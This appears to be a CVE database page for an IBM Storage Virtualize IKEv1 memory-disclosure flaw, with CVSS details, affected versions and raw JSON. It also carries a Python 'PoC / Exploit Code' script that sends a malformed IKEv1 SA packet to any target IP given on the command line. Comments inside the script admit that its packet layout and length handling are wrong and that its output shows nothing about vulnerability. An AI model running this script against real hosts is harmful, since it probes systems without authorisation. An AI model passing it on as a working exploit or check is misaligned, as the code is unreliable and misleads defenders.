Security Vulnerability Report
CVE-2025-36118 CVSS 7.5 HIGH

CVE-2025-36118

Published: 2025-11-17 21:15:57
Last Modified: 2025-12-08 15:14:18

Description

IBM Storage Virtualize 8.4, 8.5, 8.7, and 9.1 IKEv1 implementation allows remote attackers to obtain sensitive information from device memory via a Security Association (SA) negotiation request.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:storage_virtualize:8.4.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:storage_virtualize:8.5.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:storage_virtualize:8.7.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:storage_virtualize:9.1.0.0:*:*:*:*:*:*:* - VULNERABLE
IBM Storage Virtualize 8.4
IBM Storage Virtualize 8.5
IBM Storage Virtualize 8.7
IBM Storage Virtualize 9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
# CVE-2025-36118 PoC - IBM Storage Virtualize IKEv1 Information Disclosure
# This PoC demonstrates sending a malformed IKEv1 SA negotiation request
#
# NOTE(review): this script is not a reliable check for CVE-2025-36118.
# It sends a single UDP datagram and prints the raw reply without parsing it,
# so a reply only shows that something answered on the port. Neither a reply
# nor a timeout says whether a system is affected or patched; establish that
# from the installed Storage Virtualize level and the vendor advisory
# (https://www.ibm.com/support/pages/node/7250954).
# For defenders: the traffic is IKEv1 on UDP/500, so limiting that port to
# known IPsec peers reduces exposure on affected releases.
import random
import socket
import struct


def build_ike_header(isakmp_spi, exchange_type, flags=0x08):
    """Assemble the leading bytes of the datagram.

    Args:
        isakmp_spi: Initiator SPI bytes, copied in first.
        exchange_type: One-byte value written right after the two SPIs.
        flags: One-byte value written after the 0x10 version byte.

    Returns:
        ``isakmp_spi``, eight zero bytes (responder SPI), the bytes
        ``exchange_type``, ``0x10`` and ``flags``, then two zeroed 32-bit
        big-endian words (message ID and a length placeholder).

    NOTE(review): the bytes produced here do not match the 28-byte ISAKMP
    header layout of RFC 2408, which is one reason the script's output
    cannot be read as a vulnerability verdict.
    """
    leading = bytearray()
    leading.extend(isakmp_spi)
    leading.extend(bytes(8))  # responder SPI left as zeros
    # Three single bytes followed by two zero 32-bit words, big-endian.
    leading.extend(struct.pack(">BBBII", exchange_type, 0x10, flags, 0, 0))
    return bytes(leading)


def build_sa_proposal(payload_type=1):
    """Return the fixed 12-byte payload appended after the header.

    Args:
        payload_type: Value of the first byte (the original labels it
            "Next Payload").

    Returns:
        ``payload_type``, a zero reserved byte, a 16-bit length field set to
        28, proposal number 1, protocol ID 1, SPI size 4, a transform count
        of 0, and four zero SPI bytes.

    The length field says 28 although only 12 bytes are produced, and the
    transform count is zero.
    """
    fixed_fields = struct.pack(">BBHBBBB", payload_type, 0, 28, 1, 1, 4, 0)
    return fixed_fields + bytes(4)


def send_ike_exploit(target_ip, target_port=500):
    """Send one datagram to ``target_ip`` and print whatever comes back.

    Args:
        target_ip: Destination address passed to ``sendto``.
        target_port: Destination UDP port (default 500).

    Returns:
        The raw reply bytes, or ``None`` on timeout or any other error.

    The reply is printed as hex and returned unparsed; nothing here decides
    whether it contains disclosed memory.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(10)

    # Eight random bytes used as the initiator SPI.
    isakmp_spi = bytes(random.randint(0, 255) for _ in range(8))

    datagram = bytearray(
        build_ike_header(isakmp_spi, exchange_type=0x02) + build_sa_proposal()
    )
    # Overwrite bytes 24..27 with the total length. NOTE(review): this offset
    # assumes a header layout that build_ike_header does not produce.
    datagram[24:28] = struct.pack(">I", len(datagram))
    datagram = bytes(datagram)

    print(f"[*] Sending malformed IKEv1 SA negotiation to {target_ip}:{target_port}")
    print(f"[*] SPI: {isakmp_spi.hex()}")
    print(f"[*] Packet length: {len(datagram)} bytes")

    with sock:  # the socket is closed on every exit path
        try:
            sock.sendto(datagram, (target_ip, target_port))
            reply, _peer = sock.recvfrom(4096)
            print(f"[+] Received response ({len(reply)} bytes)")
            print(f"[*] Response hex: {reply.hex()}")
            return reply
        except socket.timeout:
            print("[-] No response received (target may not be vulnerable or IKE disabled)")
            return None
        except Exception as e:
            print(f"[-] Error: {e}")
            return None


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 2:
        print("Usage: python cve_2025_36118_poc.py <target_ip>")
        sys.exit(1)

    send_ike_exploit(sys.argv[1])

References

IBM vendor advisory: https://www.ibm.com/support/pages/node/7250954

Raw JSON Data

{"cve": {"id": "CVE-2025-36118", "sourceIdentifier": "[email protected]", "published": "2025-11-17T21:15:57.450", "lastModified": "2025-12-08T15:14:18.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Storage Virtualize 8.4, 8.5, 8.7, and 9.1 IKEv1 implementation allows remote attackers to obtain sensitive information from device memory via a Security Association (SA) negotiation request."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-244"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:storage_virtualize:8.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "CCD76474-4EBF-4C69-8303-881628CD0BB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:storage_virtualize:8.5.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B854C19F-9932-4A29-BA06-AD7524276FF9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:storage_virtualize:8.7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "07AFA9D0-99F4-4C1C-8719-55C2B2C96AE7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:storage_virtualize:9.1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "2181F15C-0152-40A5-8B45-E417C6D4EFE4"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250954", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}